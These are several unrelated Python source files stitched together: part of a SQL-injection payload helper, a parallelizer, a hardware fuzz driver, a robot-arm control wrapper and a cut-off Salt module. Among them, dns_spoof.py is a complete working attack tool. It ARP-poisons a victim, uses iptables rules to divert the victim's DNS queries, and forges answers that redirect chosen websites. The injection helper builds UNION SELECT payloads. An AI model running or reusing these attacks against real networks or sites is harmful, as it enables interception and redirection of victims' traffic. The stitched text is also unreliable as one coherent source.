mod_payload = unicode_encode_unescaped(payload)
elif encoding == 'doubleencode':
mod_payload = chardoubleencode(payload)
elif encoding == 'unmagicquotes':
mod_payload = unmagicquotes(payload)
else:
mod_payload = payload
return mod_payload
#Helper functions here
#========================================================================================
#Convert hex representation of SID into an actual SID string value
def sid_to_str(sid):
if sys.version_info.major < 3:
revision = ord(sid[0])
else:
revision = sid[0]
if sys.version_info.major < 3:
number_of_sub_ids = ord(sid[1])
else:
number_of_sub_ids = sid[1]
iav = struct.unpack('>Q', b'\x00\x00' + sid[2:8])[0]
sub_ids = [struct.unpack('<I', sid[8 + 4 * i:12 + 4 * i])[0]
for i in range(number_of_sub_ids)]
return 'S-{0}-{1}-{2}'.format(revision, iav, '-'.join([str(sub_id) for sub_id in sub_ids]))
#Modify the SID hex value retrieved from query
def prepare_sid(sid):
#hex_string = bytes.fromhex(sid[2:]) #python3 way
hex_data = sid[2:]
hex_string = hex_data.decode("hex")
mod_sid = sid_to_str(hex_string)
domain_sid_data = mod_sid.split('-')[:7]
domain_sid = '-'.join(domain_sid_data) + "-"
#print(domain_sid+"\n")
return domain_sid
#Prep the union select preamble
def generate_payload(column_number,column_type):
i = 0
payload = " UNION SELECT "
while i < (column_number - 2):
payload += (column_type + ",")
i += 1
return payload
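#Worked example of the payload helpers above (standalone use outside Burp; values hypothetical):
# generate_payload(4, 'null') returns " UNION SELECT null,null,"; the callers then append their
# subquery followed by "," + column_type + "--" so the column count matches the injected SELECT.
# payload_processing("'", 'unicode') returns "\u0027" (each character escaped as \uXXXX).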
|
process_parallelizer.py
|
import multiprocessing
from typing import List
from parallelizer.executor import Executor
from parallelizer.executor_event import ExecutorEvent
from parallelizer.parallelizer import Parallelizer
class ProcessParallelizer(Parallelizer):
def __init__(self, number_of_threads: int, timeout_in_seconds: float = 60):
super().__init__(number_of_threads, timeout_in_seconds)
def start_executors(self, executors: List[Executor]) -> List[ExecutorEvent]:
# Keep return values in a memory-shared dict
return_dict = multiprocessing.Manager().dict()
# Start processes
executor_events = []
processes = []
for executor in executors:
executor_event = ExecutorEvent(executor.worker_index, None, return_dict)
executor_events.append(executor_event)
process = multiprocessing.Process(target=executor.execute_all, args=[executor_event])
processes.append(process)
process.start()
# Wait for all processes to finish
for process in processes:
process.join(self.timeout_in_seconds)
# Map results back from shared dict into each event
for executor_event in executor_events:
executor_event.results = return_dict[executor_event.worker_index]
# Return events
return executor_events
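# Typical wiring (a sketch; how the Executor instances are constructed depends on
# parallelizer.executor, which is not shown here):
#   parallelizer = ProcessParallelizer(number_of_threads=4, timeout_in_seconds=30)
#   events = parallelizer.start_executors(executors)
#   results = [event.results for event in events]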
|
run_fuzz_multiprocess_main.py
|
# Lint as: python3
#
# Copyright 2020 The XLS Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Multi-process fuzz driver program.
Collects crash samples into a directory of the user's choosing.
"""
import datetime
import multiprocessing as mp
import os
import random
import sys
from absl import app
from absl import flags
import psutil
from xls.common import gfile
from xls.common import multiprocess
from xls.fuzzer import cli_helpers
from xls.fuzzer import run_fuzz_multiprocess
from xls.fuzzer.python import cpp_ast_generator as ast_generator
from xls.fuzzer.python import cpp_sample as sample
flags.DEFINE_integer('seed', 0, 'Seed value for generation')
flags.DEFINE_integer('sample_count', 1024, 'Number of samples to generate')
flags.DEFINE_string('duration', None,
'Duration to run the sample generator for')
flags.DEFINE_integer('calls_per_sample', 512,
'Arguments to generate per sample')
flags.DEFINE_string('crash_path', None, 'Path at which to place crash data')
flags.DEFINE_string(
'save_temps_path', None, 'Path of directory in which to save temporary '
'files. These temporary files include DSLX, IR, and arguments. A '
'separate numerically-named subdirectory is created for each sample')
flags.DEFINE_integer(
'worker_count', None, 'Number of workers to use for execution; defaults '
'to number of physical cores detected')
flags.DEFINE_boolean('disallow_divide', True,
'Exclude generation of divide operator')
flags.DEFINE_boolean('emit_loops', True, 'Emit loops in generator')
flags.DEFINE_boolean(
'use_llvm_jit', True, 'Use LLVM JIT to evaluate IR. The interpreter is '
'still invoked at least once on the IR even with this option enabled, but '
'this option can be used to disable the JIT entirely.')
flags.DEFINE_boolean('codegen', False, 'Run code generation')
flags.DEFINE_boolean('simulate', False, 'Run Verilog simulation.')
flags.DEFINE_string('simulator', None,
'Verilog simulator to use. For example: "iverilog".')
flags.DEFINE_boolean('execute', True, 'Execute IR (vs simply code generation)')
flags.DEFINE_boolean(
'minimize_ir', True,
'If a crasher is found, attempt to reduce the IR to find a minimal '
'reproducer.')
flags.DEFINE_boolean('print_samples', False,
'Print generated samples (to stdout)')
flags.DEFINE_boolean(
'short_samples', False,
'Generate samples with small number of nested expressions')
flags.DEFINE_string(
'summary_path', None,
'Directory in which to write the sample summary information. This records '
'information about each generated sample including which XLS op types and '
'widths. Information is written in Protobuf format with one file per '
'worker. Files are appended to by the worker.')
flags.DEFINE_integer(
'max_width_bits_types', 64,
'The maximum width of bits types in the generated samples.')
flags.DEFINE_integer(
'max_width_aggregate_types', 1024,
'The maximum width of aggregate types (tuples and arrays) in the generated '
'samples.')
flags.DEFINE_boolean(
'use_system_verilog', True,
'If true, emit SystemVerilog during codegen otherwise emit Verilog.')
FLAGS = flags.FLAGS
QUEUE_MAX_BACKLOG = 16
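# Example invocation (paths and counts are hypothetical; --crash_path is the only flag marked as
# required, see real_main() at the bottom of this file):
#   run_fuzz_multiprocess_main --crash_path=/tmp/crashers --sample_count=256 --worker_count=4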
def main(argv):
if len(argv) > 1:
raise app.UsageError('Too many command-line arguments.')
if FLAGS.simulate and not FLAGS.codegen:
raise app.UsageError('Must specify --codegen when --simulate is given.')
# Test that we can write to the crash and summary path.
for path in (FLAGS.crash_path, FLAGS.summary_path):
if path:
gfile.make_dirs(path)
with gfile.open(os.path.join(path, 'test'), 'w') as f:
print('test', file=f)
start = datetime.datetime.now()
physical_core_count = psutil.cpu_count(logical=False)
worker_count = FLAGS.worker_count or physical_core_count
worker_count = max(worker_count, 1) # Need at least one worker.
queues = (multiprocess.get_user_data() or
[mp.Queue() for _ in range(worker_count)])
queues = queues[:worker_count]
print('-- Creating pool of {} workers; physical core count {}'.format(
worker_count, physical_core_count))
workers = []
for i in range(worker_count):
queue = None if multiprocess.has_user_data_support() else queues[i]
target = run_fuzz_multiprocess.do_worker_task
args = (i, queue, FLAGS.crash_path, FLAGS.summary_path,
FLAGS.save_temps_path, FLAGS.minimize_ir)
worker = multiprocess.Process(target=target, args=args)
worker.start()
workers.append(worker)
duration_str = FLAGS.duration
duration = None if duration_str is None else cli_helpers.parse_duration(
duration_str)
seed = FLAGS.seed
if not seed:
seed = random.randrange(0, 1 << 31)
print('-- Using randomly generated seed:', seed)
sys.stdout.flush()
generator_options = ast_generator.AstGeneratorOptions(
disallow_divide=FLAGS.disallow_divide,
emit_loops=FLAGS.emit_loops,
short_samples=FLAGS.short_samples,
max_width_bits_types=FLAGS.max_width_bits_types,
max_width_aggregate_types=FLAGS.max_width_aggregate_types)
default_sample_options = sample.SampleOptions(
convert_to_ir=True,
optimize_ir=True,
use_jit=FLAGS.use_llvm_jit,
codegen=FLAGS.codegen,
simulate=FLAGS.simulate,
simulator=FLAGS.simulator,
use_system_verilog=FLAGS.use_system_verilog)
sample_count = run_fuzz_multiprocess.do_generator_task(
queues,
seed,
generator_options,
FLAGS.sample_count,
FLAGS.calls_per_sample,
default_sample_options=default_sample_options,
duration=duration,
print_samples=FLAGS.print_samples)
for i, worker in enumerate(workers):
print('-- Joining on worker {}'.format(i))
worker.join()
delta = datetime.datetime.now() - start
elapsed = delta.total_seconds()
print(
'-- Elapsed end-to-end: {} = {:.2f} seconds; {:,} samples; {:.2f} samples/s'
.format(delta, elapsed, sample_count, sample_count / elapsed))
if __name__ == '__main__':
def real_main(): # Avoid defining things in global scope.
flags.mark_flag_as_required('crash_path')
queues = tuple(mp.Queue(QUEUE_MAX_BACKLOG) for _ in range(128))
multiprocess.run_main(main, queues)
real_main()
|
dns_spoof.py
|
# dns_spoof.py
#
# Design and Program: Vishav Singh & Manuel Gonzales
#
# functions:
#
# def signal_handler(signum, frame)
# def sniffer()
# def get_address(interface, ip)
# def start_mitm(interface, victim, gateway)
# def parse(packet)
# def redirectionRules(victim)
# def getWebIP(website)
# def main()
#
# Program to spoof DNS responses to a victim machine. It works by first ARP poisoning the
# victim into believing this system is the gateway; this makes it possible to sniff the
# victim's traffic and manipulate the DNS responses the victim machine gets, redirecting
# them to a different website.
#
import setproctitle
import optparse
import signal
from netfilterqueue import NetfilterQueue
from multiprocessing import Process
from scapy.all import *
from scapy.layers.inet import IP, UDP, Ether
# Constants
CONST_DESTINATION_PORT = 53
CONST_DNS_SERVER = "8.8.8.8"
# Global
mitm_running = False
spoof_running = True
process_name = "None"
websites = [] #websites array
new_website = "None"
# main function to parse the arguments and start the processes of MITM and to sniff traffic
def main():
parser = optparse.OptionParser()
parser.add_option("-i", "--interface", type="string", dest="interface",
help="[REQUIRED] Local Interface to Use")
parser.add_option("-d", "--destination_ip", type="string", dest="destination_ip",
help="[REQUIRED] IP address to Sniff")
parser.add_option("-r", "--router_ip", type="string", dest="router_ip",
help="[REQUIRED] IP address of the gateway/router")
parser.add_option("-w", "--website", type="string", dest="website",
help="[REQUIRED] Website(s) to Spoof (Separated by commas)")
parser.add_option("-n", "--new_website", type="string", dest="new_website",
help="[REQUIRED] Website to redirect to")
parser.add_option("-t", "--title", type="string", dest="title",
help="[REQUIRED] Process name")
(options, args) = parser.parse_args()
if len(sys.argv) < 2:
parser.error("Use -h or --help for instructions")
if not options.interface or not options.destination_ip or not options.router_ip or not options.new_website or not options.website or not options.title:
parser.error("Please fill in all the required parameters")
global process_name
global new_website
global websites
try:
signal.signal(signal.SIGINT, signal_handler)
setproctitle.setproctitle(options.title)
process_name = options.title
websites = options.website.split(",")
new_website = getWebIP(options.new_website)
conf.verb = 0
redirectionRules(options.destination_ip)
except Exception:
print "Couldn't set options"
return
p1 = Process(target=start_mitm, args=(options.interface, options.destination_ip, options.router_ip))
p1.start()
p2 = Process(target=sniffer)
p2.start()
p1.join()
p2.terminate()
# Function to stop all the processes in a clean manner when SIGNINT(Ctl + C) is found.
# signum - type of signal caught
# frame - stack frame
def signal_handler(signum, frame):
global spoof_running
global process_name
print ("Process %s is Stopping..." % process_name)
spoof_running = False
time.sleep(1)
print ("Stopped %s" % process_name)
sys.exit(0)
# Function to start the netfilter queue which gets all of the traffic to port 53 from the victim machine
# it then sends each packet for parsing. On stop it clears the firewall rules
def sniffer():
global process_name
setproctitle.setproctitle("sniffer")
process_name = "sniffer"
filterQueue = NetfilterQueue()
filterQueue.bind(1, parse)
try:
filterQueue.run()
except KeyboardInterrupt:
filterQueue.unbind()
os.system('iptables -t nat -F')
os.system('iptables -t nat -X')
# Function to resolve the MAC address of a system in the network.
# interface - local interface in use
# ip - IP of system to resolve
def get_address(interface, ip):
ans = srp1(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=ip), timeout=2, iface=interface, inter=0.1)
return ans[Ether].src
# Function to start ARP poisoning a victim system in order to be able to sniff all the traffic going
# to it, and also be able to tamper with some of the traffic.
# interface - local interface in use
# victim - IP of the system to attack
# gateway - IP of the gateway/router
def start_mitm(interface, victim, gateway):
os.system("echo 1 > /proc/sys/net/ipv4/ip_forward")
global spoof_running
global process_name
setproctitle.setproctitle("mitm")
process_name = "mitm"
try:
victim_address = get_address(interface, victim)
gateway_address = get_address(interface, gateway)
while spoof_running:
send(ARP(op=2, pdst=victim, psrc=gateway, hwdst=victim_address))
send(ARP(op=2, pdst=gateway, psrc=victim, hwdst=gateway_address))
time.sleep(0.5)
sys.exit(0)
except Exception:
os.system("echo 0 > /proc/sys/net/ipv4/ip_forward")
print "Couldn't start MITM"
return
# Function to parse the packets that reach the netfilter queue (through the iptables rule).
# It checks whether each packet is a DNS request and, if so, acts accordingly when the
# request is for one of the websites to be spoofed.
# packet - packet received to the queue
def parse(packet):
global websites
global new_website
payload = packet.get_payload()
pkt = IP(payload)
if not pkt.haslayer(DNSQR):
packet.accept()
else:
for website in websites:
if website in pkt[DNS].qd.qname:
spoofed_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst)/\
UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport)/\
DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd,\
an=DNSRR(rrname=pkt[DNS].qd.qname, ttl=10, rdata=new_website))
spoofed_pkt.show()
packet.set_payload(str(spoofed_pkt))
packet.accept()
return
packet.accept()
# Function to redirect all the DNS traffic from the victim system into the netfilter queue
# victim - IP of victim system
def redirectionRules(victim):
os.system("iptables -t nat -A PREROUTING -p udp -s " + victim + " --dport " + str(CONST_DESTINATION_PORT) + " -j NFQUEUE --queue-num 1")
# Function to resolve the IP of a domain.
# website - domain name of website to redirect to
def getWebIP(website):
answer = sr1(IP(dst=CONST_DNS_SERVER)/UDP(dport=CONST_DESTINATION_PORT)/DNS(rd=1,qd=DNSQR(qname=website)),verbose=0)
data_number = answer.getlayer(DNS).ancount
if data_number == 0: #domain not found
return website
new_ip = answer.getlayer(DNS).an[data_number-1].rdata
return new_ip
# start script
main()
|
rt605_arm_control_api.py
|
#!/usr/bin/python
# -*- coding: UTF-8 -*-
import rospy
import sys
import time
import numpy as np
import os
import datetime
from ctypes import *
import rospy
from enum import Enum
import threading
from control_node.msg import robot_info
# Init the path to the Hiwin Robot's SDK .dll file
CURRENT_FILE_DIRECTORY = os.path.dirname(os.path.abspath(__file__))
PARENT_DIRECTORY = os.path.dirname(CURRENT_FILE_DIRECTORY)
# The .dll file is contained in include\hiwin_robot_sdk\
HRSDK_DLL_PATH = os.path.join(PARENT_DIRECTORY, "include", "hiwin_robot_sdk",
"HRSDK.dll")
class pos():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
def callback_function(cmd, rlt, msg, len):
#print(cmd)
pass
## Absolute position: scale x/y/z by 1/0.1 into the SDK's goal units
def AbsPostoGoal(pos):
pos[0] = pos[0]/0.1
pos[1] = pos[1]/0.1
pos[2] = pos[2]/0.1
return pos
## Relative position: scale only the non-zero x/y/z components the same way
def RelPosConvertGoal(pos):
if pos[0] != 0:
pos[0] = pos[0]/0.1
else:
pos[0] =0
if pos[1] !=0:
pos[1] = pos[1]/0.1
else:
pos[1] =0
if pos[2] !=0:
pos[2] = pos[2]/0.1
else:
pos[2] =0
return pos
def ctype_convert(target):
target_convert = (c_double * len(target))()
for index, value in enumerate(target):
target_convert[index] = c_double(value)
return target_convert
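# Minimal sketch (hypothetical values) of how the helpers above prepare a goal for the SDK:
#   goal = AbsPostoGoal([10.0, 36.8, 11.35])   # x/y/z each scaled by 1/0.1
#   c_goal = ctype_convert(goal)               # -> (c_double * 3)() array for HRSDK calls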
class HiwinRobotInterface(object):
"""Class used as bridge python-CPP and SDK."""
# The value of the robot state
IDLE_MOTION_STATE = 1
RUNNING_MOTION_STATE = 2
def __init__(self, robot_ip, connection_level, name=""):
        # type: (str, int, str) -> None
"""Hiwin Robot SDK Initialization"""
# Initialize the variables
self.ip = robot_ip
self.level = connection_level
self.robot_id = -1
self.name = name
self.CurrGoal = [0.0,36.8,11.35,-180,0,90]
self.positon = [0.0,36.8,11.35,-180,0,90]
self.Goal = [0.0,36.8,11.35,-180,0,90]
# Load the SDK
        # Make sure the SDK library exists at the given absolute path
assert os.path.exists(HRSDK_DLL_PATH), \
"HRSDK not found. Given path: {path}".format(path=HRSDK_DLL_PATH)
self.HRSDKLib = cdll.LoadLibrary(HRSDK_DLL_PATH)
try:
self.HRSDKLib.set_log_level(c_int(3))
except AttributeError:
pass
# Get the callback function
callback_type = CFUNCTYPE(None, c_uint16, c_uint16,
POINTER(c_uint16), c_int)
self.callback = callback_type(callback_function)
self.reconnecting = False # Used to know if we are trying to reconnect
self.__pub_threads = threading.Thread(target=self.__pub_robot_info)
self.__robot_info_pub = rospy.Publisher(
'robot/curr_info',
robot_info,
queue_size=1
)
self.__pub_threads.setDaemon(True)
self.__pub_threads.start()
def __pub_robot_info(self):
rate = rospy.Rate(10)
while not rospy.is_shutdown():
try:
msg = robot_info()
msg.curr_pose = self.Get_current_position()
_, msg.tool_coor = self.Get_tool_data()
# _, msg.base_coor = self.Get_base_data()
self.__robot_info_pub.publish(msg)
rate.sleep()
except KeyboardInterrupt:
break
def connect(self): # type: () -> bool
"""Connect to the Hiwin robot
:param
ip : Computer connect to robot (str)
level: Connection level (int)
:return
success: True if connection has succeeded, False otherwise (bool)
"""
self.robot_id = self.HRSDKLib.open_connection(self.ip, c_int(self.level),
self.callback)
if self.is_connected():
success = True
if self.level == 1:
                # Initialize some parameters
# set operation mode to "Auto"
self.HRSDKLib.set_operation_mode(c_int(self.robot_id),
c_int(1))
self.HRSDKLib.set_override_ratio(c_int(self.robot_id),
c_int(10))
rospy.loginfo("HIWIN Robot '{}' successfully connected.".format(self.name))
else:
success = False
return success
def reconnect(self, trials=5, sec_between_trials=2.0):
# type: (int, float) -> bool
"""Try to reconnect to the robot. The ip and connection level for the
connection are taken from the ones given during __init__().
:param trials: Number of time to try to reconnect (int)
:param sec_between_trials: seconds to sleep between each trial (float)
:return success: True if correctly connected, False otherwise
"""
# Get the connection level
connection_level = self.get_connection_level()
# If robot is already connected with the correct level, nothing to do.
if connection_level == self.level:
success = True
return success
# If the robot is already reconnecting, do nothing
if self.reconnecting:
return False
self.reconnecting = True
# Try to reconnect to the robot
for trial in xrange(trials):
rospy.loginfo('Reconnecting to HIWIN robot "{robot_name}": '
'trial #{trial_num}.'.format(robot_name=self.name,
trial_num=trial+1))
# Connect to the robot
success = self.connect()
if success:
rospy.loginfo('Successfully reconnected with the robot!')
self.reconnecting = False
return success
else:
self.close()
# Retry after a while
time.sleep(sec_between_trials)
rospy.logwarn('Could not reconnect to robot "{robot_name}"! '
'Total trials: {trials_num}'
.format(robot_name=self.name, trials_num=trials))
self.reconnecting = False
return False
    def close(self):
        # type: () -> bool
        """Disconnect from the robot
        :return
            Success: True if successfully disconnected, False otherwise
        """
error_id = self.HRSDKLib.close_connection(c_int(self.robot_id))
# If correctly disconnected error_id is equal to 0
if error_id == 0:
return True
else:
return False
def is_connected(self):
# type: () -> bool
"""Function to know if the robot is currently connected.
:return
is_connected: True if the robot is connected, False otherwise
"""
connection_level = self.get_connection_level()
# If connection_level is -1 it means that the robot is disconnected
is_connected = (connection_level == self.level)
return is_connected
def is_in_state(self, joints_states, angle_threshold=0.01):
# type: (list[float], float) -> bool
"""Check if the robot is in the given state (or close enough).
The robot is in the state if all the angles are the same as the given
        joints states (allowing an optional angle_threshold)
:param joints_states: list of joints angles expressed in radians
:param angle_threshold: value (in radians) over which two angles are
considered different one to the other.
"""
success, current_joints_states = self.get_current_joints()
# For each joint of the robot
for current_joint_state, joint_state in zip(
current_joints_states, joints_states):
# Check if the current value is the same as the input one
if abs(current_joint_state-joint_state) >\
angle_threshold:
# One of the joints is not in the state input
return False # The robot is not in the given state
        # All the joints of the robot match the given state
return True
# arm state whether idle
def is_in_idle(self):
# type: () -> bool
"""Tells whether the robot is in IDLE or not."""
robot_motion_state = self.get_robot_motion_state()
is_in_idle_state = (robot_motion_state == self.IDLE_MOTION_STATE)
return is_in_idle_state
# arm state whether busy
def is_running(self):
# type: () -> bool
"""Tells whether the robot is running (moving) or not."""
robot_motion_state = self.get_robot_motion_state()
is_running = (robot_motion_state == self.RUNNING_MOTION_STATE)
return is_running
def get_hrsdk_version(self):
# type: () -> (int, str)
"""Get HRSDK version
:return
error_id:
Success :0
Fail :else
version : HRSDK version (string)
"""
version = create_string_buffer(15)
error_id = self.HRSDKLib.get_HRSDK_version(version)
return error_id, version.value.decode("utf-8")
    def get_connection_level(self):
        # type: () -> int
        """Get the user connection level to the robot
:return
Connection level:
Operator :0
Expert :1
"""
# TODO: Check if the robot is connected first
connection_level = self.HRSDKLib.get_connection_level(
c_int(self.robot_id))
return connection_level
    def set_connection_level(self, level):
        # type: (int) -> bool
        """Set the user connection level
        :parameter
            level:
                Operator :0
                Expert :1
        :return
            bool:
                True: success
                False: failure
        """
        result = self.HRSDKLib.set_control_level(c_int(self.robot_id),
                                                 c_int(level))
        return result == level
# arm state return:
# 1:idle
    # 2:motion
# 3:stop
# 4:delay
    # 5:command stay
# fail: alarm code -1
def get_robot_motion_state(self):
return self.HRSDKLib.get_motion_state(self.robot_id)
## PtP motion ABS
def Step_AbsPTPCmd(self, Pos, mode=0):
Pos_abs = AbsPostoGoal(Pos)
Pos_ctype = ctype_convert(Pos_abs)
self.HRSDKLib.ptp_pos(c_int(self.robot_id), c_int(mode),Pos_ctype)
## Line motion ABS
def Step_AbsLine_PosCmd(self, Pos, mode=0, smooth_value=0):
Pos_abs = AbsPostoGoal(Pos)
Pos_ctype = ctype_convert(Pos_abs)
self.HRSDKLib.lin_pos(c_int(self.robot_id), c_int(mode), c_int(smooth_value),Pos_ctype)
## PtP motion relate
def Step_RelPTPCmd(self, Pos_rel, mode=0):
Pos_rel = RelPosConvertGoal(Pos_rel)
Pos_ctype = ctype_convert(Pos_rel)
self.HRSDKLib.ptp_rel_pos(c_int(self.robot_id), c_int(mode),Pos_ctype)
## Line motion relate
def Step_RelLineCmd(self, Pos_rel, mode=0, smooth_value=0):
Pos_rel = RelPosConvertGoal(Pos_rel)
Pos_ctype = ctype_convert(Pos_rel)
self.HRSDKLib.lin_rel_pos(c_int(self.robot_id), c_int(mode), c_int(smooth_value),Pos_ctype)
def Stop_motion(self):
"""Stop the motion of the robot."""
self.HRSDKLib.motion_abort(self.robot_id)
def Continue_motion(self):
"""continue the motion of the robot."""
self.HRSDKLib.motion_continue(self.robot_id)
def Hold_motion(self):
"""Hold the motion of the robot."""
self.HRSDKLib.motion_hold(self.robot_id)
def Delay_motion(self,delay):
"""Delay the motion of the robot."""
self.HRSDKLib.motion_delay(self.robot_id,c_int(delay))
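    # Read the current Cartesian pose [x, y, z, pitch, roll, yaw]; x/y/z are scaled back down by 10 to match the command units.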
def Get_current_position(self):
Current_Pos = (c_double * 6)()
result = self.HRSDKLib.get_current_position(c_int(self.robot_id),Current_Pos)
#Current_Pos = float(Current_Pos)
value = [float(value) for value in (Current_Pos)]
value[0:3] = [ele/10 for ele in value[0:3]]
return value
#------set system variable
#set all arm speed
def Set_override_ratio(self,Speed):
self.HRSDKLib.set_override_ratio(c_int(self.robot_id), c_int(Speed))
#get all arm speed
def Get_override_ratio(self):
override_ratio = self.HRSDKLib.get_override_ratio(c_int(self.robot_id))
return override_ratio
#set all arm acceleration
def Set_acc_dec_ratio(self,acc):
self.HRSDKLib.set_acc_dec_ratio(c_int(self.robot_id), c_int(acc))
#get all arm acceleration
#only Auto mode can set the ratio of acceleration/deceleration
def Get_acc_dec_ratio(self):
acc_ratio = self.HRSDKLib.get_acc_dec_ratio(c_int(self.robot_id))
return acc_ratio
#set all arm acceleration time
def Set_acc_time(self,value):
self.HRSDKLib.set_acc_time(c_int(self.robot_id), c_int(value))
#get all arm acceleration time
def Get_acc_time(self):
acc_time = self.HRSDKLib.get_acc_time(c_int(self.robot_id))
return acc_time
#set arm PTP motion speed
def Set_ptp_speed(self,Speed):
self.HRSDKLib.set_ptp_speed(c_int(self.robot_id), c_int(Speed))
#get arm PTP motion speed
def Get_ptp_speed(self):
return self.HRSDKLib.get_ptp_speed(c_int(self.robot_id))
#set arm LINE motion speed
def Set_lin_speed(self,Speed):
return self.HRSDKLib.set_lin_speed(c_int(self.robot_id), c_double(Speed))
#get arm LINE motion speed
def Get_lin_speed(self):
return self.HRSDKLib.get_lin_speed(c_int(self.robot_id))
# arm back home motion
#only Manual mode can set
def Go_home(self):
self.HRSDKLib.jog_home(c_int(self.robot_id))
#jog stop
def Jog_stop(self):
self.HRSDKLib.jog_stop(c_int(self.robot_id))
# set robot base number
def Set_base_number(self,basenum):
self.HRSDKLib.set_base_number(c_int(self.robot_id),c_int(basenum))
def Get_base_number(self):
return self.HRSDKLib.get_base_number(c_int(self.robot_id))
# set robot base
def Define_base(self,basenum,Coor):
Coor_ctype = ctype_convert(Coor)
result = self.HRSDKLib.define_base(c_int(self.robot_id),c_int(basenum),Coor_ctype)
return result
# get robot base
def Get_base_data(self):
Coor = (c_double * 6)()
basenum = self.Get_base_number()
result = self.HRSDKLib.get_base_data(c_int(self.robot_id),c_int(basenum),Coor)
value = [float(value) for value in (Coor)]
value[0:3] = [ele/10 for ele in value[0:3]]
return result == 0, value
# set tool number
def Set_tool_number(self,toolnum):
self.HRSDKLib.set_tool_number(c_int(self.robot_id),c_int(toolnum))
# get tool number
def Get_tool_number(self):
return self.HRSDKLib.get_tool_number(c_int(self.robot_id))
def Define_tool(self,toolnum,Coor):
Coor_ctype = ctype_convert(Coor)
result = self.HRSDKLib.define_tool(c_int(self.robot_id),c_int(toolnum),Coor_ctype)
return result
def Get_tool_data(self):
Coor = (c_double * 6)()
toolnum = self.Get_tool_number()
result = self.HRSDKLib.get_tool_data(c_int(self.robot_id),c_int(toolnum),Coor)
value = [float(value) for value in (Coor)]
value[0:3] = [ele/10 for ele in value[0:3]]
return result == 0, value
# # Servo on: 1 Servo off: 0
def Set_motor_state(self, state):
self.HRSDKLib.set_motor_state(c_int(self.robot_id),c_int(state))
# get motor state
def Get_motor_state(self):
return self.HRSDKLib.get_motor_state(self.robot_id)
# Manual mode: 0 Auto mode: 1
def Set_operation_mode(self,mode):
self.HRSDKLib.set_operation_mode(c_int(self.robot_id),c_int(mode))
def Get_operation_mode(self):
return self.HRSDKLib.get_operation_mode(self.robot_id)
def Clear_alarm(self):
self.HRSDKLib.clear_alarm(c_int(self.robot_id))
# def Get_alarm_code(self):
# alarm_code = np.zeros(20,dtype=np.c_uint64)
# #alarm_code = np.uint64(alarm_code)
# #alarm_code = (c_uint64 * 20)()
# count = 20
# result = self.HRSDKLib.get_alarm_code(c_int(self.robot_id),c_int(count),alarm_code)
# return result == 0, [float(value) for value in (alarm_code)]
# I/O control
def Get_current_digital_inputs(self):
# type: () -> (list[int])
"""Get Robot current digital inputs.
:returns
inputs: list of the value of the digital inputs
(1 if on 0 if off)
"""
# If the robot is not connected, try reconnecting
if not self.is_connected():
successfully_reconnected = self.reconnect()
if not successfully_reconnected:
rospy.logwarn("Robot disconnected, it was not possible to get "
"the digital inputs")
return [-1 for _ in range(48)]
inputs = []
for i in range(1, 49):
inputs.append(self.HRSDKLib.get_digital_input(c_int(self.robot_id),
c_int(i)))
return inputs
def Get_current_digital_outputs(self):
# type: () -> (list[int])
"""Get Robot current digital outputs.
:returns
outputs: list of the value of the digital outputs
(1 if on 0 if off)
"""
# If the robot is not connected, try reconnecting
if not self.is_connected():
successfully_reconnected = self.reconnect()
if not successfully_reconnected:
rospy.logwarn("Robot disconnected, it was not possible to get "
"the digital outputs")
return [-1 for _ in range(48)]
outputs = []
for i in range(1, 49):
outputs.append(self.HRSDKLib.get_digital_output(c_int(self.robot_id),
c_int(i)))
return outputs
def Set_digital_output(self,index,value):
if not self.is_connected():
successfully_reconnected = self.reconnect()
if not successfully_reconnected:
rospy.logwarn("Robot disconnected, it was not possible to set "
"the digital outputs")
self.HRSDKLib.set_digital_output(c_int(self.robot_id), c_int(index),c_bool(value))
def Set_robot_output(self,index,value):
if not self.is_connected():
successfully_reconnected = self.reconnect()
if not successfully_reconnected:
rospy.logwarn("Robot disconnected, it was not possible to set "
"the digital outputs")
self.HRSDKLib.set_robot_output(c_int(self.robot_id), c_int(index),c_bool(value))
def Get_current_robot_outputs(self):
# type: () -> (list[int])
"""Get Robot current robot outputs.
:returns
outputs: list of the value of the robot outputs
(1 if on 0 if off)
"""
# If the robot is not connected, try reconnecting
if not self.is_connected():
successfully_reconnected = self.reconnect()
if not successfully_reconnected:
rospy.logwarn("Robot disconnected, it was not possible to get "
"the robot outputs")
return [-1 for _ in range(8)]
outputs = []
for i in range(1, 9):
outputs.append(self.HRSDKLib.get_robot_output(c_int(self.robot_id),
c_int(i)))
return outputs
def Get_current_robot_inputs(self):
# type: () -> (list[int])
"""Get Robot current digital inputs.
:returns
inputs: list of the value of the digital inputs
(1 if on 0 if off)
"""
# If the robot is not connected, try reconnecting
if not self.is_connected():
successfully_reconnected = self.reconnect()
if not successfully_reconnected:
rospy.logwarn("Robot disconnected, it was not possible to get "
"the digital inputs")
return [-1 for _ in range(8)]
inputs = []
for i in range(1, 9):
inputs.append(self.HRSDKLib.get_robot_input(c_int(self.robot_id),
c_int(i)))
return inputs
|
process.py
|
# -*- coding: utf-8 -*-
# Import python libs
from __future__ import absolute_import, with_statement
import copy
import os
import sys
import time
import errno
import types
import signal
import logging
import threading
import contextlib
import subprocess
import multiprocessing
import multiprocessing.util
# Import salt libs
import salt.defaults.exitcodes
import salt.utils
import salt.log.setup
from salt.log.mixins import NewStyleClassMixIn
# Import 3rd-party libs
import salt.ext.six as six
from salt.ext.six.moves import queue, range # pylint: disable=import-error,redefined-builtin
from tornado import gen
log = logging.getLogger(__name__)
# pylint: disable=import-error
HAS_PSUTIL = False
try:
import psutil
HAS_PSUTIL = True
except ImportError:
pass
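# Run `systemd-notify <action>` and report whether the command exited successfully.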
def systemd_notify_call(action):
process = subprocess.Popen(['systemd-notify', action], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
process.communicate()
status = process.poll()
return status == 0
def notify_systemd():
'''
Notify systemd that this process has started
'''
try:
import systemd.daemon
except ImportError:
